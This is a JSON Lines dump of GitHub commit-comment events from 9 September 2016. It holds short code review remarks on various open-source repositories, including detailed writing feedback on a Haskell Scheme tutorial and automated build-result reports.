{"id":"4542899280","type":"CommitCommentEvent","actor":{"login":"wkentaro"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18971283,"position":8,"line":8,"path":"jsk_pcl_ros/test/test_euclidean_segmentation.test","commit_id":"fc5fa1677ea09a6b84b995346f0ef2b938e1dc57","created_at":"2016-09-09T23:07:08Z","updated_at":"2016-09-09T23:07:08Z","body":"So without `--clock` and `use_sim_time:=false` is the best?"}},"created_at":"2016-09-09T23:07:08Z"}
{"id":"4542901268","type":"CommitCommentEvent","actor":{"login":"XShockinFireX"},"repo":{"name":"ZacHack/Alias"},"payload":{"comment":{"id":18971290,"position":null,"line":null,"path":null,"commit_id":"75ca45313172bcfc02bed34a8c1156981f299233","created_at":"2016-09-09T23:07:48Z","updated_at":"2016-09-09T23:07:48Z","body":"you're back o.o"}},"created_at":"2016-09-09T23:07:48Z"}
{"id":"4542906432","type":"CommitCommentEvent","actor":{"login":"jodli"},"repo":{"name":"jodli/InsuranceV2"},"payload":{"comment":{"id":18971309,"position":78,"line":124,"path":"Source/InsuranceV2.Modules/ToolBar/ViewModels/ToolBarViewModel.cs","commit_id":"aa8c71dcba46a0c7521f2ad35208fe40ae870864","created_at":"2016-09-09T23:09:26Z","updated_at":"2016-09-09T23:09:26Z","body":"Use [ObservableObject](https://github.com/jodli/InsuranceV2/blob/master/Source/InsuranceV2.Common/MVVM/ObservableObject.cs).\r\n[Example](https://github.com/jodli/InsuranceV2/blob/master/Source/InsuranceV2.Modules/Content/ViewModels/InsureeDetailsViewModel.cs#L17) :cactus: "}},"created_at":"2016-09-09T23:09:26Z"}
{"id":"4542907074","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18971315,"position":13,"line":50,"path":"gpMgmt/bin/gppylib/operations/restore.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-09T23:09:39Z","updated_at":"2016-09-09T23:09:39Z","body":"since restored_ao_tables is a set , do we really need to do the `(sch, tbl) not in restored_ao_tables` check"}},"created_at":"2016-09-09T23:09:39Z"}
{"id":"4542911558","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971323,"position":13,"line":12,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:11:06Z","updated_at":"2016-09-09T23:11:06Z","body":"You need to assume this user is new to Haskell. Throwing around words like monad transformer and interpreter theory might be a bit much. Instead point them to learn you a haskell or the article if they haven't learned haskell yet or has just started. By clarifying that the tutorial is for someone who has a basic grasp of haskell but doesn't know where to go next will make it easier for you in terms of targeting your audience and what you can assume while writing it out."}},"created_at":"2016-09-09T23:11:06Z"}
{"id":"4542913705","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971326,"position":13,"line":12,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:11:46Z","updated_at":"2016-09-09T23:11:46Z","body":"Also it should be be 'so if' not 'so f'"}},"created_at":"2016-09-09T23:11:46Z"}
{"id":"4542916332","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971332,"position":17,"line":15,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:12:38Z","updated_at":"2016-09-09T23:12:38Z","body":"Might be better to just say open up a PR for discussion on the improvement and possible inclusion."}},"created_at":"2016-09-09T23:12:38Z"}
{"id":"4542919975","type":"CommitCommentEvent","actor":{"login":"brainsik"},"repo":{"name":"awslabs/amazon-redshift-utils"},"payload":{"comment":{"id":18971346,"position":67,"line":174,"path":"src/UnloadCopyUtility/redshift-unload-copy.py","commit_id":"6a0cf3843d792aff2b6101905a1f81d9bdf62e93","created_at":"2016-09-09T23:13:51Z","updated_at":"2016-09-09T23:13:51Z","body":"These fail as the kmsClient (which is used by the decrypt function) isn't set until further below."}},"created_at":"2016-09-09T23:13:51Z"}
{"id":"4542922284","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971348,"position":22,"line":20,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:14:40Z","updated_at":"2016-09-09T23:14:40Z","body":"C style syntax? Remember this is meant for beginners. Simpler more direct language is more effective at getting the point across to a larger audience. This includes those who may be programming for the first time ever."}},"created_at":"2016-09-09T23:14:40Z"}
{"id":"4542922748","type":"CommitCommentEvent","actor":{"login":"kexinzhu"},"repo":{"name":"kexinzhu/Test_Apps"},"payload":{"comment":{"id":18971349,"position":null,"line":null,"path":null,"commit_id":"980513ebc36795765601cfc0cd0beb8ed3814598","created_at":"2016-09-09T23:14:50Z","updated_at":"2016-09-09T23:14:50Z","body":"Screenshot (Video)"}},"created_at":"2016-09-09T23:14:50Z"}
{"id":"4542922798","type":"CommitCommentEvent","actor":{"login":"darrenflexxu"},"repo":{"name":"darrenflexxu/Cximage"},"payload":{"comment":{"id":18971350,"position":null,"line":null,"path":null,"commit_id":"37e0a2ccbd28d374363861e8fc771879b8ab11c8","created_at":"2016-09-09T23:14:51Z","updated_at":"2016-09-09T23:14:51Z","body":"其实可以去掉编译环境的配置"}},"created_at":"2016-09-09T23:14:51Z"}
{"id":"4542924004","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18971354,"position":19,"line":19,"path":"truffle/src/main/java/org/jruby/truffle/core/rope/NativeRope.java","commit_id":"58e79d5c48a6bd4135b59bf8701e4693b95a11f2","created_at":"2016-09-09T23:15:17Z","updated_at":"2016-09-09T23:15:17Z","body":"Is there a reason to have this as its own field? You should be able to get the same value calling `byteLength()` (also a final field) from the base `Rope` class."}},"created_at":"2016-09-09T23:15:17Z"}
{"id":"4542924875","type":"CommitCommentEvent","actor":{"login":"carlosfrodriguez"},"repo":{"name":"OTRS/otrs"},"payload":{"comment":{"id":18971355,"position":61,"line":61,"path":"scripts/test/EmailParser/MultipartMixed.t","commit_id":"28a46d10847415aea478633a8580141efd775512","created_at":"2016-09-09T23:15:35Z","updated_at":"2016-09-09T23:15:35Z","body":"Hi @mgruner,\r\n\r\nShould the name of this tests be \"HTML email\" rather than \"plain email\"?\r\n\r\n((enjoy))\r\ncr"}},"created_at":"2016-09-09T23:15:35Z"}
{"id":"4542927348","type":"CommitCommentEvent","actor":{"login":"carlosfrodriguez"},"repo":{"name":"OTRS/otrs"},"payload":{"comment":{"id":18971358,"position":86,"line":787,"path":"Kernel/System/EmailParser.pm","commit_id":"28a46d10847415aea478633a8580141efd775512","created_at":"2016-09-09T23:16:25Z","updated_at":"2016-09-09T23:16:25Z","body":"@mgruner \r\n\r\nEn empty line is missing here :-)\r\n\r\n((enjoy))\r\ncr"}},"created_at":"2016-09-09T23:16:25Z"}
{"id":"4542927997","type":"CommitCommentEvent","actor":{"login":"mwalkerwells"},"repo":{"name":"gcanti/flow-static-land"},"payload":{"comment":{"id":18971360,"position":87,"line":107,"path":"README.md","commit_id":"16a84aad3825cfe34868e87665677a29d18f8a1e","created_at":"2016-09-09T23:16:40Z","updated_at":"2016-09-09T23:16:40Z","body":"Ok, so I conflated two things. Sorry to thrash you with wrong information. You should include your library for the loader—it doesn't mean that it is included in your webpack bundle, just that the flow types will be stripped by the loader."}},"created_at":"2016-09-09T23:16:40Z"}
{"id":"4542929370","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971367,"position":25,"line":21,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:17:10Z","updated_at":"2016-09-09T23:17:10Z","body":"homoiconicity. Hmmm.... Who's your target audience again? Beginners or people who want to build a language but don't know where to start? Focus on that when you write and you should choose one or the other."}},"created_at":"2016-09-09T23:17:10Z"}
{"id":"4542930435","type":"CommitCommentEvent","actor":{"login":"jodli"},"repo":{"name":"jodli/InsuranceV2"},"payload":{"comment":{"id":18971372,"position":13,"line":11,"path":"Source/InsuranceV2.Modules/StatusBar/ViewModels/StatusBarViewModel.cs","commit_id":"44e103e88af8e5328f0a462a95e87136a3a00471","created_at":"2016-09-09T23:17:32Z","updated_at":"2016-09-09T23:17:32Z","body":"Use [DisposableViewModel](https://github.com/jodli/InsuranceV2/blob/master/Source/InsuranceV2.Common/MVVM/DisposableViewModel.cs)."}},"created_at":"2016-09-09T23:17:32Z"}
{"id":"4542931465","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18971380,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-09T23:17:49Z","updated_at":"2016-09-09T23:17:49Z","body":":-( This is technically a source-breaking change, but since we already support dynamic casts between the optional types I think it would only manifest when using `type(of:)`. Is that all right?"}},"created_at":"2016-09-09T23:17:49Z"}
{"id":"4542931734","type":"CommitCommentEvent","actor":{"login":"golddranks"},"repo":{"name":"golddranks/bawwaw"},"payload":{"comment":{"id":18971382,"position":1,"line":1,"path":"bawwaw/pom.xml","commit_id":"76efb0f02380e1115277ae13b2d9fbbb2db5d0ec","created_at":"2016-09-09T23:17:55Z","updated_at":"2016-09-09T23:17:55Z","body":"xDDDD"}},"created_at":"2016-09-09T23:17:55Z"}
{"id":"4542932796","type":"CommitCommentEvent","actor":{"login":"mahsu"},"repo":{"name":"bigredhacks/bigredhacks2016"},"payload":{"comment":{"id":18971389,"position":5,"line":1073,"path":"routes/api/admin.js","commit_id":"d421245c8e5a02663a2d8dc83e335d60a3ecb518","created_at":"2016-09-09T23:18:17Z","updated_at":"2016-09-09T23:18:17Z","body":"keep api params"}},"created_at":"2016-09-09T23:18:17Z"}
{"id":"4542934107","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971391,"position":26,"line":22,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:18:45Z","updated_at":"2016-09-09T23:18:45Z","body":"Extra period. Also when writing a tutorial use we not I. It's more inclusive of the reader and makes it easier to get them to work with your tutorial emotionally because it feels like you're building it together with them, not you building it and showing them. It's a subtle but powerful difference"}},"created_at":"2016-09-09T23:18:45Z"}
{"id":"4542936907","type":"CommitCommentEvent","actor":{"login":"rhfung-flexport"},"repo":{"name":"rhfung-flexport/netsuite"},"payload":{"comment":{"id":18971395,"position":null,"line":null,"path":null,"commit_id":"a4138208afad000d5f2c54234a011a06416f05fb","created_at":"2016-09-09T23:19:39Z","updated_at":"2016-09-09T23:19:39Z","body":"👍 "}},"created_at":"2016-09-09T23:19:39Z"}
{"id":"4542939181","type":"CommitCommentEvent","actor":{"login":"nezzard"},"repo":{"name":"nezzard/Test2"},"payload":{"comment":{"id":18971400,"position":null,"line":null,"path":null,"commit_id":"e8012eff77e84ecbd6606269608a8ca497221f7b","created_at":"2016-09-09T23:20:24Z","updated_at":"2016-09-09T23:20:24Z","body":"Тест"}},"created_at":"2016-09-09T23:20:24Z"}
{"id":"4542939646","type":"CommitCommentEvent","actor":{"login":"nezzard"},"repo":{"name":"nezzard/Test2"},"payload":{"comment":{"id":18971404,"position":3,"line":1,"path":"index.php","commit_id":"e8012eff77e84ecbd6606269608a8ca497221f7b","created_at":"2016-09-09T23:20:32Z","updated_at":"2016-09-09T23:20:32Z","body":"ліоаіваі аіваів"}},"created_at":"2016-09-09T23:20:32Z"}
{"id":"4542945131","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18971426,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T23:22:26Z","updated_at":"2016-09-09T23:22:26Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2328 of 2334 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T23:22:26Z"}
{"id":"4542946939","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"carrierwaveuploader/carrierwave"},"payload":{"comment":{"id":18971433,"position":null,"line":null,"path":null,"commit_id":"c45699c318ca895f89fa3304204e48b5f1c411f1","created_at":"2016-09-09T23:23:07Z","updated_at":"2016-09-09T23:23:07Z","body":"🎉 thank you! This is awesome :D"}},"created_at":"2016-09-09T23:23:07Z"}
{"id":"4542950875","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"ev3dev/ev3dev"},"payload":{"comment":{"id":18971439,"position":70,"line":70,"path":"logo/ev3devLogoSmall.svg","commit_id":"774389faca790992a0a87be4f3da3bdedc72f2d2","created_at":"2016-09-09T23:24:26Z","updated_at":"2016-09-09T23:24:26Z","body":"At some point we really should fix this :laughing:"}},"created_at":"2016-09-09T23:24:26Z"}
{"id":"4542952619","type":"CommitCommentEvent","actor":{"login":"hpd"},"repo":{"name":"Homebrew/homebrew-science"},"payload":{"comment":{"id":18971443,"position":null,"line":null,"path":null,"commit_id":"0b70e2494dbb4447e6c1bc3a861aca66591cd27c","created_at":"2016-09-09T23:25:09Z","updated_at":"2016-09-09T23:25:09Z","body":"Hello. I've had to comment out the \"-DUSE_LIBRAW=OFF\" line in my local repo in order to make use of OIIO's libRaw support. Is there a better approach?"}},"created_at":"2016-09-09T23:25:09Z"}
{"id":"4542954045","type":"CommitCommentEvent","actor":{"login":"williewillus"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":18971449,"position":null,"line":null,"path":null,"commit_id":"c87762fa30352c227e1972f28fcc594529c59615","created_at":"2016-09-09T23:25:40Z","updated_at":"2016-09-09T23:25:40Z","body":"might want to bump the \"next version number\" in the buildscript up to 322 since I released a 321 after you merged it into BotaniaV2, so if you made a release we would have two 321's :P"}},"created_at":"2016-09-09T23:25:40Z"}
{"id":"4542955400","type":"CommitCommentEvent","actor":{"login":"dogergdi"},"repo":{"name":"dogergdi/jansolo"},"payload":{"comment":{"id":18971453,"position":8,"line":8,"path":".gitignore","commit_id":"944bb0230c856f4e0c4c9e30c5cdea711a5afe63","created_at":"2016-09-09T23:26:09Z","updated_at":"2016-09-09T23:26:09Z","body":"no se lo que ise :v: "}},"created_at":"2016-09-09T23:26:09Z"}
{"id":"4542959510","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/Infinideastudio-Frameworks"},"payload":{"comment":{"id":18971458,"position":7,"line":6,"path":"README.md","commit_id":"698e9d192fde627eafb7fde8363863efb369c8f2","created_at":"2016-09-09T23:27:42Z","updated_at":"2016-09-09T23:27:42Z","body":"蜜汁<br>不会换行吗？"}},"created_at":"2016-09-09T23:27:42Z"}
{"id":"4542971068","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18971481,"position":null,"line":null,"path":null,"commit_id":"2007a875507cc89d9f44e79cc6570af9d991c935","created_at":"2016-09-09T23:31:51Z","updated_at":"2016-09-09T23:31:51Z","body":"@Miigon 最后的结论是如果都放在一个地方就不需要改名字了啊(╯‵□′)╯︵┻━┻\r\n现在启动游戏的方法是./launcher client和./launcher server。-f参数都删掉了，过程中完全没地方让你输入dll名称啊。就算有（配置文件），也是一次性工作啊"}},"created_at":"2016-09-09T23:31:51Z"}
{"id":"4542973115","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18971484,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-09T23:32:35Z","updated_at":"2016-09-09T23:32:35Z","body":"谁说不会呢【雾\r\n那renew分支还能做吗？"}},"created_at":"2016-09-09T23:32:35Z"}
{"id":"4542974380","type":"CommitCommentEvent","actor":{"login":"halt-hammerzeit"},"repo":{"name":"halt-hammerzeit/react-isomorphic-render"},"payload":{"comment":{"id":18971489,"position":null,"line":null,"path":null,"commit_id":"74970e5650028e72eec6d0fbaf37b3e278e2af5a","created_at":"2016-09-09T23:33:03Z","updated_at":"2016-09-09T23:33:03Z","body":"There was an error `routes parameter not set`.\r\nFixed in `4.1.10`"}},"created_at":"2016-09-09T23:33:03Z"}
{"id":"4542982276","type":"CommitCommentEvent","actor":{"login":"JordiPolo"},"repo":{"name":"JordiPolo/dataframe"},"payload":{"comment":{"id":18971509,"position":24,"line":34,"path":"lib/dataframe/table.ex","commit_id":"99a425d94f32644a32debb6dd7bff204024c7a1f","created_at":"2016-09-09T23:35:59Z","updated_at":"2016-09-09T23:35:59Z","body":"I think the order should be\r\n- Only access data in table thought the Table module (in progress)\r\n- Write some benchmarks with different data (small, big, many columns, many rows)\r\n- Try different backends and compare\r\n"}},"created_at":"2016-09-09T23:35:59Z"}
{"id":"4542991521","type":"CommitCommentEvent","actor":{"login":"jackparmer"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":18971524,"position":null,"line":null,"path":null,"commit_id":"f967dbd1322b0c782e4a2c5cf377292dee3defcd","created_at":"2016-09-09T23:39:22Z","updated_at":"2016-09-09T23:39:22Z","body":"Epic! I'll put this in next weeks email :Fist:"}},"created_at":"2016-09-09T23:39:22Z"}
{"id":"4542995204","type":"CommitCommentEvent","actor":{"login":"iKarith"},"repo":{"name":"Landrash/pi-gen"},"payload":{"comment":{"id":18971534,"position":49,"line":70,"path":"README.md","commit_id":"275c29e66dedd74fe80debb8326362b4bac0fab5","created_at":"2016-09-09T23:40:51Z","updated_at":"2016-09-09T23:40:51Z","body":"How's this look?\n\n``` diff\ndiff --git a/README.md b/README.md\nindex 9ff754f..18beb5d 100644\n--- a/README.md\n+++ b/README.md\n@@ -71,5 +71,7 @@ maintenance and allows for more easy customization.\n    enhancements, etc.  This is a base desktop system, with some development\n    tools installed.\n \n- - Stage 4, complete Raspbian system.  More development tools, large packages\n-   like LibreOffice, email, sonic-pi, wolfram-engine, etc.  All the things.\n+ - Stage 4, complete Raspbian system.  More development tools, an email\n+   reader, learning tools like Scratch, specialized packages like sonic-pi and\n+   wolfram-engine, system documentation, office productivity, etc.  Basically\n+   this stage installs all the things.\n```\n\nJoseph\n\n"}},"created_at":"2016-09-09T23:40:51Z"}
{"id":"4542996355","type":"CommitCommentEvent","actor":{"login":"JordiPolo"},"repo":{"name":"JordiPolo/dataframe"},"payload":{"comment":{"id":18971535,"position":24,"line":34,"path":"lib/dataframe/table.ex","commit_id":"99a425d94f32644a32debb6dd7bff204024c7a1f","created_at":"2016-09-09T23:41:18Z","updated_at":"2016-09-09T23:41:18Z","body":"But yes, I agree, it may very well turn out that using tuples is much faster. Or at least faster for the most common operations"}},"created_at":"2016-09-09T23:41:18Z"}
{"id":"4542998994","type":"CommitCommentEvent","actor":{"login":"LemADEC"},"repo":{"name":"LemADEC/WarpDrive"},"payload":{"comment":{"id":18971549,"position":null,"line":null,"path":null,"commit_id":"b457bca93487e8a8cd01e235cb511cea95424a74","created_at":"2016-09-09T23:42:23Z","updated_at":"2016-09-09T23:42:23Z","body":"Players are abusing it to 'hide' from the radar."}},"created_at":"2016-09-09T23:42:23Z"}
{"id":"4543002840","type":"CommitCommentEvent","actor":{"login":"alinolandry"},"repo":{"name":"alinolandry/Test_application"},"payload":{"comment":{"id":18971559,"position":4,"line":15,"path":"index.html","commit_id":"ed0bd27890aee894e1136f7870ee04ebe9b46ad0","created_at":"2016-09-09T23:43:53Z","updated_at":"2016-09-09T23:43:53Z","body":"tu es malade"}},"created_at":"2016-09-09T23:43:53Z"}
{"id":"4543003133","type":"CommitCommentEvent","actor":{"login":"Alexandr23-4"},"repo":{"name":"Alexandr23-4/hello-world"},"payload":{"comment":{"id":18971560,"position":1,"line":1,"path":"README.md","commit_id":"f96951b010ac377ea564ce376c686df7b7f67698","created_at":"2016-09-09T23:44:00Z","updated_at":"2016-09-09T23:44:00Z","body":"readme-edits"}},"created_at":"2016-09-09T23:44:00Z"}
{"id":"4543007762","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971579,"position":30,"line":25,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:45:44Z","updated_at":"2016-09-09T23:45:44Z","body":"I agree. Make sure to note 2nd edition and link to it."}},"created_at":"2016-09-09T23:45:44Z"}
{"id":"4543012484","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971591,"position":34,"line":28,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:47:36Z","updated_at":"2016-09-09T23:47:36Z","body":"Fully fledged Scheme interpreter written in Haskell. implements in C should be implemented in C.\r\n'The Scheme'\r\nmore fleshed out rather than more featured. It's less awkward as a sentence. "}},"created_at":"2016-09-09T23:47:36Z"}
{"id":"4543013323","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18971597,"position":null,"line":null,"path":null,"commit_id":"7f8501cb80e16e7950a40a38d58464436fa1602e","created_at":"2016-09-09T23:47:54Z","updated_at":"2016-09-09T23:47:54Z","body":"buildingunit (Unknown) - x86_64-MacOS-10.10-clang: OK (2389 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T23:47:54Z"}
{"id":"4543015087","type":"CommitCommentEvent","actor":{"login":"Andrew-Collins"},"repo":{"name":"UQ-Communication-Systems/public"},"payload":{"comment":{"id":18971610,"position":null,"line":null,"path":null,"commit_id":"ad9f5b0b90e7d47f02b6f1e26b3458b7bcc6aa78","created_at":"2016-09-09T23:48:34Z","updated_at":"2016-09-09T23:48:34Z","body":"Just realised this was here, shame no-one is going to use it this year. :stuck_out_tongue: "}},"created_at":"2016-09-09T23:48:34Z"}
{"id":"4543015449","type":"CommitCommentEvent","actor":{"login":"joshfriend"},"repo":{"name":"yyuu/pyenv"},"payload":{"comment":{"id":18971613,"position":null,"line":null,"path":null,"commit_id":"a0c5fe42e9c47ab555a703abe0f5c3230cdb6081","created_at":"2016-09-09T23:48:43Z","updated_at":"2016-09-09T23:48:43Z","body":"git can be configured to automatically push tags associated with the commits being pushed as well :+1:\r\n\r\n```\r\n$ git config push.followTags true\r\n```"}},"created_at":"2016-09-09T23:48:43Z"}
{"id":"4543015947","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18971615,"position":13,"line":11,"path":"Lesson_9/modules/validation.rb","commit_id":"64079a08946df081dcd6ea1efbf97fd6ef7d9043","created_at":"2016-09-09T23:48:57Z","updated_at":"2016-09-09T23:48:57Z","body":"Здесь тоже можно было воспользоваться инстанс переменной уровня класса: `@validations`."}},"created_at":"2016-09-09T23:48:57Z"}
{"id":"4543016438","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971618,"position":43,"line":36,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:49:10Z","updated_at":"2016-09-09T23:49:10Z","body":"There's a lot of resources but everything from 29 on doesn't answer the question Why Lisp?\r\n\r\nAgain this is Haskell not other languages. Best to not reference them and focus on the question of this section."}},"created_at":"2016-09-09T23:49:10Z"}
{"id":"4543017071","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18971620,"position":67,"line":67,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T23:49:25Z","updated_at":"2016-09-09T23:49:25Z","body":"Well, translating this page is probably a bad time/value tradeoff compared to encouraging translating the app itself.  I guess we should just not tag anything."}},"created_at":"2016-09-09T23:49:25Z"}
{"id":"4543017770","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18971622,"position":118,"line":118,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T23:49:43Z","updated_at":"2016-09-09T23:49:43Z","body":"yeah totally.  I guess the copy part of my copy-paste failed :)"}},"created_at":"2016-09-09T23:49:43Z"}
{"id":"4543017912","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971623,"position":58,"line":41,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:49:47Z","updated_at":"2016-09-09T23:49:47Z","body":"Don't use w/ as short hand for a tutorial"}},"created_at":"2016-09-09T23:49:47Z"}
{"id":"4543018057","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18971625,"position":11,"line":11,"path":"templates/zerver/about.html","commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T23:49:50Z","updated_at":"2016-09-09T23:49:50Z","body":"yeah, good idea "}},"created_at":"2016-09-09T23:49:50Z"}
{"id":"4543018496","type":"CommitCommentEvent","actor":{"login":"cnoon"},"repo":{"name":"Alamofire/Alamofire"},"payload":{"comment":{"id":18971626,"position":4,"line":3,"path":"Alamofire.podspec","commit_id":"9563afbdca6fe55d87d081a83ac04479c4e76a99","created_at":"2016-09-09T23:49:59Z","updated_at":"2016-09-09T23:49:59Z","body":"We're aware. Alamofire 4.0.0 isn't released yet."}},"created_at":"2016-09-09T23:49:59Z"}
{"id":"4543020506","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18971629,"position":9,"line":8,"path":"Lesson_9/modules/validation.rb","commit_id":"64079a08946df081dcd6ea1efbf97fd6ef7d9043","created_at":"2016-09-09T23:50:55Z","updated_at":"2016-09-09T23:50:55Z","body":"Годится, хотя теперь приходится определять валидации в каждом подклассе. Решение в том чтобы определять валидации на уровне базового класса, а при проверке проверять не только переменную `@validations` у текущего класса, но и у базового класса.\r\n\r\nИными словами мы смотрим есть ли валидации в текущем классе, потом смотрим есть ли валидации в его родителе и так далее вверх по иерархии наследования."}},"created_at":"2016-09-09T23:50:55Z"}
{"id":"4543021145","type":"CommitCommentEvent","actor":{"login":"sunglim"},"repo":{"name":"beagleterm/beagle-term"},"payload":{"comment":{"id":18971632,"position":null,"line":null,"path":null,"commit_id":"5dc9e15782be365f4947ad7d35116556b90349e1","created_at":"2016-09-09T23:51:14Z","updated_at":"2016-09-09T23:51:14Z","body":"@RandomlyKnighted  can you share your email? "}},"created_at":"2016-09-09T23:51:14Z"}
{"id":"4543022445","type":"CommitCommentEvent","actor":{"login":"cbo78150"},"repo":{"name":"cbo78150/cake_login"},"payload":{"comment":{"id":18971637,"position":null,"line":null,"path":null,"commit_id":"7d9e0715e6e64cfe7dd677f037c2383642c6a50e","created_at":"2016-09-09T23:51:52Z","updated_at":"2016-09-09T23:51:52Z","body":"this file is new"}},"created_at":"2016-09-09T23:51:52Z"}
{"id":"4543022907","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971638,"position":67,"line":50,"path":"docs/00_overview.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:52:04Z","updated_at":"2016-09-09T23:52:04Z","body":"You talk about Why Haskell is good for production. That's not relevant to the scope of the tutorial. Why Haskell for writing a Scheme Interpreter? What features does Haskell have that makes it more powerful and useful at writing a compiler compared to another language like C or C++?"}},"created_at":"2016-09-09T23:52:04Z"}
